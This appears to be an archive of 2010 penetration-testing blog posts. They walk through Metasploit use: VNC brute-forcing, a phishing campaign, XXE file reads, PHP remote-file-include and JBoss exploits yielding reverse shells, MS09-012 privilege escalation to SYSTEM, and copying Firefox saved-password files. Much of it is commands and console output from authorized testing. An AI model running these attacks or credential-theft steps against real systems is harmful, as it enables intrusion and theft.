Friday, December 17, 2010

Metasploit and VNC Password Bruteforcing

You probably missed it but jduck recently snuck in a VNC mixin and vnc_login module to the trunk.

This is awesome because before that I had to use Immunity's VAAseline to do VNC bruteforcing. But now you can just use vnc_login.

So the scenario is you find yourself on the other end of a VNC server.

Its tedious to password guess like this

Instead let's use the metasploit module

and throw a dictionary attack against the VNC server

Looks like the VNC no auth module had been ported and stuck in there too :-)


Thursday, December 16, 2010

Conducting a Phishing Campaign in Metasploit Pro

So new job gets me new fun toys. Figured i'd try the fancy shmancy tools and do a phish campaign with metasploit pro.

1. Go click on campaigns and star filling stuff out like what you want to call it

2. Set up your web campaign. With the web campaign you can actually host a webpage along with your exploit instead of just getting the typical "please wait" stuff.

3. Fill out your name of the template and the html of what you want it to say

4. By default it will run browser autopwn

5. Lets just pick an exploit to throw at them instead of all of them

6. Once you click save, it should look something like this:

7. After that you can set up the email portion of the phish

8. Fill out the sending server options

9. Then fill out the text for the body of your email

10. After you click save, you'll go to the add email addresses section where you can import a list, or type them in

11. Kinda looks like this when its all filled out. To start click the start campaign button

12. You can see the status of your sent emails and as people click them the percentage will change

13. I guess what the email could look like if you werent trying too hard :-)

14. And the web page serving up the exploit

15. You can now see that a user clicked the link and our percentage has changed

I'll cover hosts and sessions later. Only gripe is the lack of configuration ability in the exploit payload section. I've been told this will be addressed shortly even though a lot of work has been put into smart defaults the ability to change it when necessary would be nice.


Tuesday, November 23, 2010

iPhone + Burp

This is one of those things that is super simple and I figure most folks have already done or know how to do. There may be a few people out there whose time I save with this post. Who knows. Lets get on with it.

Just as with the Droid apps, when an untrusted certificate (Burp) shows up for an app requiring SSL/TLS, the app crashes and burns. The best way (same as Droid) to fix this is to import Burp as a trusted Certificate Authority (CA).

Why would we want to do this? Apps on mobile phones are cool but some would argue the web-services the apps are communicating with can be even juicier. We'd like to intercept the communication to the web-services and play around a bit.

You'll need to export the Burp Certificate, I usually open Firefox, set the browser to run thru Burp, view the certificate, export the certificate. Much like this.........

Browse to (while proxying thru Burp)

"Get Certificate"

Select PortSwigger's cert

Save Certificate with a .cer extension (.cer is what the iPhone recognizes)

Start a web server to host the PortSwiggerCA.cer 

Browse to the location of the PortSwigger.cer file

The iPhone detects .cer, asks you to install as a CA, do it :-)

WiFi configuration, click the blue arrow on the right of your network

  Configure with Burp's IP & Proxy

Hopefully that was easy enough to follow along. Now you can proxy your iPhone apps thru Burp.

~Happy Hacking

Monday, November 22, 2010

wXf Videos from AppSec DC 2010

Here are some of the videos from AppSec DC 2010 and our presentation (Seth Law, Chris Gates and I) on wXf (Web Exploitation Framework).

Background: Back in March of this year, Seth approached me with the idea of creating a framework that would allow us to put all of our discontiguous scripts together. Then we decided "our" could mean the AppSec community as a whole. Why not take everyone's one-off scripts, proof-of-concept tools and ideas and centralize them? So........we've worked off and on since March to build it.

The only frameworks available to us at the time (and even now) which were "WEB-centric" had user interfaces that weren't what we were looking for, broke after updates and/or randomly OR just didn't have the HTTP libs we needed (SOAP, JSON, Flex, etc).

So the first thing we focused on was the console interface. We figure this will probably be the interface with the most mileage. At the moment, we are still working on the console interface as well as improving the core. The framework won't be perfect from day one but we'd like to make it as easy to use as possible.

We decided Metasploit is possibly the best designed piece of open source software/framework that we've seen and it works incredibly well. People are familiar with it and it looks nice. So we decided to make wXfconsole look like msfconsole. Same *general* type of commands  and interface layout.

Release will occur in the next couple of months. We have a list of people to "beta-test" the software and want to ensure we limit the amount of bugs to a minimum upon release.

Now, for the videos.

User Agent Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Directory Traversal Fuzzer by Chris Gates (carnal0wnage) from cktricky on Vimeo.

wXf Web Server Stack by Seth Law from cktricky on Vimeo.

Monday, November 8, 2010

Tethering Your Droid to a Linux System

Image my happiness with i got the droid update and saw usb tethering available.

Then image my sadness-->rage that VendorX wants to charge to charge another 15 bucks to tether.

so following the instructions from here it is possible to tether via USB on linux. Evidently PDAnet works great but i dont use windows cept for powerpoint and i cant afford a mac.

so here's how to get it going if you dont want to click the i'll never remember that URL.

install proxoid on your droid

download & extract the android sdk to your linux system

turn on android usb debugging -->application-->development-->usb debugging

turn on proxoid

connect usb

cg@c0:~$ cd android-sdk-linux_86/tools/

cg@c0:~/android-sdk-linux_86/tools$ sudo ./adb start-server

cg@c0t:~/android-sdk-linux_86/tools$ ./adb forward tcp:8080 tcp:8080

set your FireFox network settings to use localhost 8080 and you can surf. You should also be able to set your whole system to go thru the droid as well if you set the system wide network proxy.

Saturday, November 6, 2010

Adobe XML Injection Metasploit Module

I just pushed out code coverage for the Adobe XML External Entity Injection vulnerability in multiple adobe products including: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and
8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data
Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

References Here:

I recommend you read security-asessment's pdf on it, its good.

Anyway, its a cool bug.
1 -->because it affects several products although most people have probably never heard of most of them except for ColdFusion.
2 -->its enabled by default on all those products you've never heard of except for ColdFusion, with the exception of CF 8 which appears to have it turned on by default.
3 -->You have to apply patches for CF individually and there is no automated process. Since this vuln got little media attention I've seen alot of hosts that are still missing this patch and/or didn't turn off the vuln service.

On with the demo!

So against a patched host or someone that has disabled the service in ColdFusion you'll see one of two things; either 404's for the checks or 200 for /flex2gateway/ and 500 for the http or https check.

If you get a bunch of 400's then you need to set the VHOST

When it works, you'll see something like this for /etc/passwd

and like this when you asked for a file that doesn't exist or doesn't have permission to read (since CF doesn't run as root on linux, requesting /etc/shadow wont work) :-(

At this point, you're probably like "so what" well whats cool about arbitrary file read is that 1. it also works on Windows:

and 2. that whole attack is now cool again because you can just request that file too


Friday, October 8, 2010

A new definition of "win"

Ben Tomhave has a good post over on his blog

go read it. its short...wont take long, I promise.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.

Monday, September 27, 2010

Hacking: The Next Generation Book Review

Hacking: The Next Generation Book Review

Nitesh Dhanjani, Billy Rios, & Brett Hardin

5 stars

Good Intro to Next Gen Attacks

First Impressions...skinny book. Strike One. Chapter 1 -- "Intelligence Gathering: Peering Through the Windows to Your Organization" spends a lot of time on physical security and social engineering and no mention of Maltego. I'm not sure how anyone can write a book on Intelligence Gathering and NOT include Maltego. Strike Two.

At this point i was thinking I had a dud on my hands BUT Chapter 2 --- "Inside-Out Attacks: The Attacker Is the Insider" redeems. Tons of code and examples to make XSS work in "realistic" scenarios mix the right amount of tech and narrative. My only gripe was that they talked about using XSS shell for XSS exploitation instead of using BEeF which is actively maintained and developed.

All the other chapters (except for Chapter 3) were very good, none of the others are as technical as chapter 2 but I believe they cover the current trends in a entertaining and readable way. Like one reviewer mentioned the information covered in Chapter 5 -- "Cloud Insecurity: Sharing the Cloud with Your Enemy" was not what I expected. It covered high level "possible" attacks versus any "probable" attacks. With the exception of possibly making insecure VM's and getting people to run it. Chapter 7 -- "Infiltrating the Phishing Underground: Learning from Online Criminals?" was a "chapterfied" version of the authors talk on the subject. Chapter 4 -- "Blended Threats: When Applications Exploit Each Other" was a good overview of stringing vulnerabilities that would be/were not considered high risk into high risk issues by combining one or more together which actually is "next generation".

Chapter 3, IMO didnt cover anything new. Mostly a discussion of insecure protocols, arp spoofing, email spoofing. While still a relevant issue in security not "next generation".


Thursday, September 23, 2010

AppSec DC 2010 and Web Exploitation Framework

Back in March, I spoke of inactivity on this blog because of time being devoted to a new tool.

The post can be found Here :

The tool is actually a combination of tools or Web Exploitation Framework (wXf). The idea is to roll the massive amounts of various AppSec tools into a single framework. Simplifies things, we hope.

Come November 10th, at AppSec DC 2010 we will be presenting the framework and laying out a road-map. I hope it becomes useful to consultants and application security practitioners.

More info can be found at the following link (full schedule):


...and here (wXf Specific):


Look forward to seeing you all there.

~Happy Hacking


Saturday, September 4, 2010

Grabbing Index Pages Of Webservers

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS

msf auxiliary(http_index_grabber) > run

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/

[*] Received 301 to for

[-] Received 403 for

[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[*] Received 302 to for
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/
[*] Received 302 to for

you can then check out the folder with the results

code is here:

Monday, August 2, 2010

Scanning IPv6 Enabled Hosts

Nmap will scan IPv6 enabled hosts if you pass it the -6 switch, but only does TCP Connect scans and no OS identification, which makes sense because OS identification uses nuances of ipv4 responses...

carnal0wnage ~: nmap -6 -sV 2002:53e9:a52a::832:3316:5042 -p53,80,222

Starting Nmap 5.21 ( ) at 2010-03-19 20:42 UTC
Nmap scan report for 2002:53e9:a52a::832:3316:5042
Host is up (0.17s latency).
53/tcp open domain ISC BIND 9.X
80/tcp open http nginx
222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds

carnal0wnage ~: nmap -6 -sV ::ffff:

Starting Nmap 5.21 ( ) at 2010-03-19 21:00 UTC
Nmap scan report for ::ffff:
Host is up (0.024s latency).
Not shown: 795 closed ports, 203 filtered ports
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.9)
8080/tcp open http-proxy Squid webproxy 2.6.STABLE16

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds

and metasploit supports ipv6

msf auxiliary(http_version) > run

[*] 2002:53e9:a52a:0000:0000:0832:3316:5042 is running nginx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Wednesday, July 28, 2010

Scapy, Traceroute and Pretty Pictures

much much more available in the documentation

but here is how to make a cool traceroute graph from you to another host.


Welcome to Scapy (v1.1.1 / -)
>>> res, unans = traceroute("",dport=80,maxttl=20)
Begin emission:
*****************Finished to send 20 packets.
Received 18 packets, got 18 answers, remaining 2 packets
1 11
2 11
3 11
4 11
5 11
6 11
7 11
8 11
9 11
10 11
11 11
14 SA
15 SA
16 SA
17 SA
18 SA
19 SA
20 SA
>>> res.graph(target="> /tmp/graph.svg")

opening up /tmp/graph.svg will give you:


Monday, July 26, 2010

Reversing Android Apps

thanks to cktricky for pointing me to:


Once you've gotten it installed/unzipped its fairly easy to use. Download your .apk from the emulator.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk 2441 KB/s (625416 bytes in 0.250s)

From there simply decode the .apk

user@dev:~/android-tutorial/reverse$ ./apktool d com.joelapenna.foursquared.apk foursquare
I: Baksmaling...

I: Loading resource table...

I: Decoding resources...

I: Loading resource table from file: /home/user/apktool/framework/1.apk

I: Copying assets and libs...

From there you should have a folder looking something like this

inside your smali folder will be all the decompiled java. have fun.

actually after i did the above, I found this which is a video covering the above and previous posts.

Friday, July 23, 2010

Using the Android Debug Bridge (adb)

The android debug bridge (adb) has lots of useful features. its documented here:

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb
Android Debug Bridge version 1.0.25

some of the features you may want to immediately mess with are:

listing devices

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
emulator-5554 device

getting an interactive shell on the emulator

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb shell
# ls

cat'ing useful stuff inside that shell

# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 5 (v5l)

BogoMIPS : 233.47

Features : swp half thumb fastmult vfp edsp java

CPU implementer : 0x41

CPU architecture: 5TEJ

CPU variant : 0x0

CPU part : 0x926

CPU revision : 5

Cache type : write-through

Cache clean : not required

Cache lockdown : not supported

Cache format : Harvard

I size : 4096

I assoc : 4

I line length : 32

I sets : 32

D size : 65536

D assoc : 4

D line length : 32

D sets : 512

Hardware : Goldfish
Revision : 0000

Serial : 0000000000000000

and probably pulling things off the file system so you can reverse them.

user@dev:~/android-tutorial/android-sdk-linux_86/tools$ ./adb pull /data/app/com.joelapenna.foursquared.apk com.joelapenna.foursquared.apk
2441 KB/s (625416 bytes in 0.250s)

Wednesday, July 21, 2010

Accessing your android emulator on the command line

A poster on one of the other android posts mentioned you can just telnet into the android app if you've got the emulator running.

Its easy to do and the preferred way if you just want to script events. Just telnet into localhost 5554 and you can issue emulator commands.

user@dev:~$ telnet localhost 5554
Trying ::1...


Connected to localhost.

Escape character is '^]'.

Android Console: type 'help' for a list of commands



Android console command help:

help|h|? print a list of commands

event simulate hardware events

geo Geo-location commands

gsm GSM related commands

kill kill the emulator instance

network manage network settings

power power related commands

quit|exit quit control session

redir manage port redirections

sms SMS related commands

avd manager virtual device state

window manage emulator window

help event
allows you to send fake hardware events to the kernel

available sub-commands:
event send send a series of events to the kernel
event types list all type aliases
event codes list all code aliases for a given type
event text simulate keystrokes from a given text


help geo
allows you to change Geo-related settings, or to send GPS NMEA sentences

available sub-commands:
geo nmea send an GPS NMEA sentence
geo fix send a simple GPS fix

you get the idea...

Tuesday, July 6, 2010

Fatal System Error Pseudo Book Review

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo Book Review since its not "really" a tech book. The book is written with very little technical jargon and its an interesting read with a mix of information on Barrett Lyon who fought DDOS attacks against various websites, the ties of online gambling and the mob with a transition into the fight by Andy Crocker, a British cybersecurity agent, against the Russian and eastern block carding cybercriminials. An entertaining read about the history of carding and denial of service attacks by eastern block criminals.

In the category of:

Masters of Deception: The Gang That Ruled Cyberspace

The Fugitive Game: Online with Kevin Mitnick

Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age

learn about hacker history type books.


Thursday, July 1, 2010

Revisiting HALFLM Stuff

I covered some of the halflm challenge sniffing stuff in a previous post.

but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.

so here are some updated links.

where to grab the tables:

where to grab the program:

Some gotchas I ran into on the last PT was some reason getting odd hashes in the SMB and NTLM sniffing modules.

in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get smb_login scanned, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5

Wednesday, June 30, 2010

more with rpcclient

Got asked to help remotely locate local admins on boxes on a network.

rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]

rpcclient $> enumalsgroups builtin

group:[Administrators] rid:[0x220]

group:[Backup Operators] rid:[0x227]

group:[Guests] rid:[0x222]

group:[Network Configuration Operators] rid:[0x22c]

group:[Power Users] rid:[0x223]

group:[Remote Desktop Users] rid:[0x22b]

group:[Replicator] rid:[0x228]

group:[Users] rid:[0x221]

Now you would think that doing a querygroup would give you the right output, but actually you get a:

rpcclient $> querygroup 0x220

Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.

Anyway it takes one more step but you can do it this way:

rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]

rpcclient $> queryaliasmem builtin 0x220



Then you can look up who those SIDs belong to

rpcclient $> lookupsids

Usage: lookupsids [sid1 [sid2 [...]]]

rpcclient $> lookupsids S-1-5-21-1214440339- 1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)

rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)

rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT

Not sure about the 512 (its a MS built-in account I think) but the 1003 was the user I added to the local admins group.

Monday, June 28, 2010

Firefox Saved Passwords

Nothing earth shattering, but since this is a place for my notes...

Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.

So how to do it?

Actually its simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:


If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.

I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...

-thanks to Mubix for telling me about this.

Friday, June 25, 2010

Android and another use for XSS

This morning I saw a tweet by @dinodaizovi . Dino posted a comment regarding an article by Google (you can find Here ) responding to an interesting method of gaining Root via "RootStrap" (link: Here ).

To summarize Google sort of dismissed the idea that this application (and research, by @jonoberheide was damaging because the application he created didn't have "root" permissions, it simply had network permissions to download rootkits and install them in areas of the device not meant for normal applications.

Google/Android removed the application with an over the air update. We are saved! .....okay {sarcasm}

It got me thinking, I remembered something I touched on during a presentation at a recent NoVAH Hackers meeting. The idea was basically using something like XSS to redirect an Android user to download an attacker's application(s).

Here is the video, stick around to the end, you may get a chuckle.

Android and another use for XSS from cktricky on Vimeo.

Happy Hacking!


Tuesday, June 22, 2010

wxruby on Ubuntu

Thank you to Mario Steele for creating a wxruby gem compatible with the more recent versions of Ubuntu's G++ compiler.

You can download the gem Here .

Install by.....

sudo gem install --local wxruby-2.0.1-x86-linux.gem

If you've tried to run DirChex or DirSnatch you'll notice problems. The above tip should help to resolve.

~Happy Hacking

Wednesday, May 26, 2010

Burp 1.3.5 & Android SSL Apps update

As of the release of Burp 1.3.5 the same methodology shown in a previous post video (using Android SSL enforced apps with Burp) is a bit different.

You still need to import Burp as a CA to Android (using keytool & BountyCastle tool) but Burp will generate certificates on the fly (correctly) so you no longer need to configure your own CA Cert in Burp for each App.

Also, if you are running Ubuntu its likely you have multiple versions of Java jvm running.

This affects the keytool, actually it affects the classpath location for the jar file "bcprov-jdk16-141.jar".

For instance, I had both:

/usr/lib/jvm/java-6-sun-     &      /usr/lib/jvm/java-6-sun-

So a quick fix is to perform a

sudo apt-get remove sun-java6-bin sun-java6-jre sun-java6-jdk

and then

sudo apt-get install sun-java6-bin sun-java6-jre sun-java6-jdk

Then move the bcprov-jdk16-141.jar file back into your newest jvm directory (as of now

~Happy Hacking

Wednesday, May 19, 2010


Thanks to a tip from a friend it turns out I've had the wrong version of DirSnatch posted all along. Nobody complained so I had no clue. My apologies, this was developed while on travel and ........well stuff happens.

To sum it all up, a working version of DirSnatch_v2.1 both source & executable have been uploaded.

To recap:

The 2.1 version has the following mods

1) Added tab to export all directories & sub-directories in URL format so that you can test each for PUT (see DirChex) or whatever else you may need this for.

2) Progression bar so you can see the status

3) Better threading to keep the GUI functional

Happy Hacking!


Tuesday, May 11, 2010

Using the Metasploit PHP Remote File Include Module

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:
and make your PHPURI
let's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...


Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the

msf exploit(php_include) > set PHPURI /
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL:
[*] PHP include server started.
[*] Sending /1/
[*] Command shell session 1 opened ( -> at Sun May 09 21:37:26 -0400 2010

0.jpeg license.txt slog_users.txt version.txt
1.jpeg index.asp old
adminlog.php install.txt readme.txt slogin_genpass.php launch.asp slog_users.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Monday, May 10, 2010

Playing with the MS09-012 Windows Local Exploit

Back in 09 there was a buzz about token kidnapping by Argeniss

subsequently patched

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened ( ->

meterpreter > getuid
meterpreter > pwd
Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
on the multi/handler side...
[*] Command shell session 1 opened ( ->

(C) Copyright 1985-2003 Microsoft Corp.

nt authority\system

Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened ( ->

msf exploit(handler) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] ->
2 meterpreter NT AUTHORITY\SYSTEM @ LAB ->

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Sunday, May 9, 2010

Metasploit jboss deployment file repository exploit

MC pushed out a new exploit today (jboss_deploymentfilerrepository)

so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened ( -> at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
3 shell ->

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
